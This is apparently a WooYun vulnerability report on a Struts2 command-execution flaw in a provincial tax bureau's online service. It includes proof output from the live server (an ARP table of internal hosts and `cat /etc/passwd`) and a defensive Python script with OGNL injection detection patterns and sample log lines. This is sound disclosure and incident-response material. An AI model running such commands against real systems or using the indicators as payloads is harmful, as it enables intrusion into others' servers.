
Vulnerability summary

Defect ID: wooyun-2013-038546

Title: Struts2 vulnerability in the Hebei Local Taxation Bureau online tax service hall

Vendor: bsfw.hebds.gov.cn

Author: hollies

Submitted: 2013-09-30 08:58

Fix date: 2013-11-14 08:58

Public disclosure: 2013-11-14 08:58

Type: command execution

Severity: high

Self-assessed Rank: 20

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-09-30: details sent to the vendor, awaiting vendor handling
2013-10-03: vendor confirmed; details visible to the vendor only
2013-10-13: details opened to core white hats and relevant domain experts
2013-10-23: details opened to regular white hats
2013-11-02: details opened to intern white hats
2013-11-14: details opened to the public

Brief description:

Detailed description:

Command execution through http://bsfw.hebds.gov.cn/wbcms/ls/lsAction.do returned the application's deployment directory:
dir:/oracle/middleware/user_projects/domains/bsfw_domain/applications/wbcms
followed by the host's ARP cache. The bucket layout is AIX `arp -a` output, consistent with the AIX-style /etc/passwd shown in the proof below; the entries enumerate neighbouring hosts on 192.189.200.0/24 that are reachable from the compromised server:
? (192.189.200.6) at 0:11:25:be:52:cc [ethernet] stored in bucket 18
? (192.189.200.7) at 0:11:25:be:50:9e [ethernet] stored in bucket 19
? (192.189.200.15) at 0:11:25:be:59:ce [ethernet] stored in bucket 27
? (192.189.200.17) at 0:11:25:be:50:9b [ethernet] stored in bucket 29
? (192.189.200.21) at 0:12:d9:89:83:59 [ethernet] stored in bucket 33
? (192.189.200.31) at 0:14:c2:5f:4b:b1 [ethernet] stored in bucket 43
? (192.189.200.36) at 2:1f:a0:0:0:21 [ethernet] stored in bucket 48
? (192.189.200.47) at e4:1f:13:fa:80:fd [ethernet] stored in bucket 59
? (192.189.200.55) at 2:1f:a0:0:0:21 [ethernet] stored in bucket 67
? (192.189.200.56) at 0:1f:a0:1:c8:f [ethernet] stored in bucket 68
? (192.189.200.58) at 0:1f:a0:1:c7:33 [ethernet] stored in bucket 70
? (192.189.200.60) at 5c:f3:fc:94:67:24 [ethernet] stored in bucket 72
? (192.189.200.62) at 0:11:bc:ac:28:0 [ethernet] stored in bucket 74
[per-bucket counts for buckets 0 to 148 omitted: the 13 non-empty buckets are 18, 19, 27, 29, 33, 43, 48, 59, 67, 68, 70, 72 and 74, one entry each, matching the entries listed above]
There are 13 entries in the arp table.

Proof of vulnerability (output of the command on the target; the `!` password fields are AIX, where the hashes live in /etc/security/passwd and `*` marks accounts that cannot log in):

cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh
weblogic:!:204:202::/oracle/middleware:/usr/bin/ksh
sshd:*:205:203::/var/empty:/usr/bin/ksh
alphasta:!:206:1::/home/alphasta:/usr/bin/ksh

Fix:

Upgrade Struts2. The report does not name the specific advisory, but at the time of submission (September 2013) the 2013 OGNL injection advisories S2-013 through S2-016 were all closed by release 2.3.15.1, so upgrade to that release or, better, to the current one, and check every application deployed on the WebLogic domain, not only wbcms. Two further points for the responder: the ARP cache above lists 13 hosts on 192.189.200.0/24 that the compromised server can reach, and the passwd output shows a `weblogic` account whose home is /oracle/middleware, the same tree the application is deployed from, so injected commands most likely run as that account (the report does not show `id` output; confirm it and review what that account can reach).
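As an added example (not part of the original report and not the reporter's tooling), two checks a responder on the affected WebLogic host would run after reading the above. The first scans web-server access log lines for requests to Struts action endpoints (`*.do`, `*.action`) whose query strings carry the OGNL evaluation markers used by the 2013 advisories, decoding twice so `%25`-encoded payloads are not missed. The second checks the version in the deployed `struts2-core-*.jar` file name (under the application's WEB-INF/lib) against 2.3.15.1, the first release that closed S2-016. The log lines, client addresses and jar names in the block are constructed for illustration; the "common" log layout, the indicator list, the endpoint suffixes and the minimum version are assumptions to adjust to the local environment.

```python
"""Triage checks for a suspected Struts2 OGNL command-execution compromise.

Added example, not the reporter's tooling. Assumptions: Apache/WebLogic
"common" access-log layout, the OGNL indicator list below, and 2.3.15.1
as the minimum struts2-core version (first release that closed S2-016).
"""
import re
from urllib.parse import unquote_plus

# OGNL evaluation markers used by the 2013 Struts2 RCE advisories
# (S2-013 to S2-016); matched after URL decoding, case-insensitively.
OGNL_INDICATORS = [
    r"%\{",                                # %{ ... } forced OGNL evaluation
    r"\$\{",                               # ${ ... } expression
    r"#_memberAccess",                     # sandbox settings object
    r"@java\.lang\.Runtime@",              # static call on Runtime
    r"@java\.lang\.ProcessBuilder@",
    r"ognl\.OgnlContext",
    r"[?&](?:redirect|redirectAction|action):",   # S2-016 parameter prefixes
]
_INDICATOR_RE = re.compile("|".join(OGNL_INDICATORS), re.IGNORECASE)
_ACTION_RE = re.compile(r"\.(?:do|action)(?:\?|$)", re.IGNORECASE)
# "common" log format: client ident user [time] "METHOD target PROTO" status size
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def scan_access_log(lines):
    """Return (client, timestamp, decoded_target) for Struts action requests
    whose target carries an OGNL indicator after double URL decoding."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue                      # unparseable line: skip, do not guess
        client, ts, _method, target, _status, _size = m.groups()
        if not _ACTION_RE.search(target):
            continue                      # only Struts action endpoints
        decoded = unquote_plus(unquote_plus(target))   # catch %25-encoded payloads
        if _INDICATOR_RE.search(decoded):
            hits.append((client, ts, decoded))
    return hits


_JAR_RE = re.compile(r"struts2-core-(\d+(?:\.\d+)*)\.jar$")
FIXED_VERSION = (2, 3, 15, 1)   # assumption: first release closing S2-016


def struts_core_is_patched(jar_name, minimum=FIXED_VERSION):
    """True if the struts2-core jar name carries a version >= minimum.
    Raises ValueError for anything that is not a struts2-core jar name."""
    m = _JAR_RE.search(jar_name)
    if not m:
        raise ValueError("not a struts2-core jar: %s" % jar_name)
    version = tuple(int(p) for p in m.group(1).split("."))
    width = max(len(version), len(minimum))          # pad so 2.3.15 < 2.3.15.1
    return version + (0,) * (width - len(version)) >= minimum + (0,) * (width - len(minimum))


# Constructed sample log lines (not from the affected host). The second and
# fifth carry indicator fragments only; they are not working payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Sep/2013:08:40:12 +0800] "GET /wbcms/ls/lsAction.do HTTP/1.1" 200 5120',
    '10.0.0.5 - - [30/Sep/2013:08:41:03 +0800] "GET /wbcms/ls/lsAction.do?redirect:%24%7B%23_memberAccess%7D HTTP/1.1" 302 0',
    '10.0.0.9 - - [30/Sep/2013:08:42:55 +0800] "POST /wbcms/login.do HTTP/1.1" 200 812',
    '10.0.0.7 - - [30/Sep/2013:08:43:10 +0800] "GET /images/logo.png?x=%25%7B1%7D HTTP/1.1" 200 3400',
    '10.0.0.7 - - [30/Sep/2013:08:44:21 +0800] "GET /wbcms/index.action?id=%25%7B%40java.lang.Runtime%40getRuntime()%7D HTTP/1.1" 500 0',
]


if __name__ == "__main__":
    for client, ts, target in scan_access_log(SAMPLE_LOG):
        print("suspicious %s %s %s" % (client, ts, target))
    for jar in ("struts2-core-2.3.14.3.jar", "struts2-core-2.3.15.1.jar"):
        print(jar, "patched" if struts_core_is_patched(jar) else "VULNERABLE")
```

The scan deliberately ignores non-action URLs (the fourth sample line carries `%{` but is a static image request), which keeps noise down but assumes the application maps Struts actions only to `.do` and `.action`; widen `_ACTION_RE` if the struts.xml or web.xml on the host says otherwise. The version check compares only the jar name, so a vendor-rebuilt jar with a misleading name still needs a look at its MANIFEST.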

Copyright notice: when reposting, credit the source: hollies@WooYun


Response

Vendor response:

Severity: medium

Rank: 6

Confirmed: 2013-10-03 01:19

Vendor reply:

Latest status:

None yet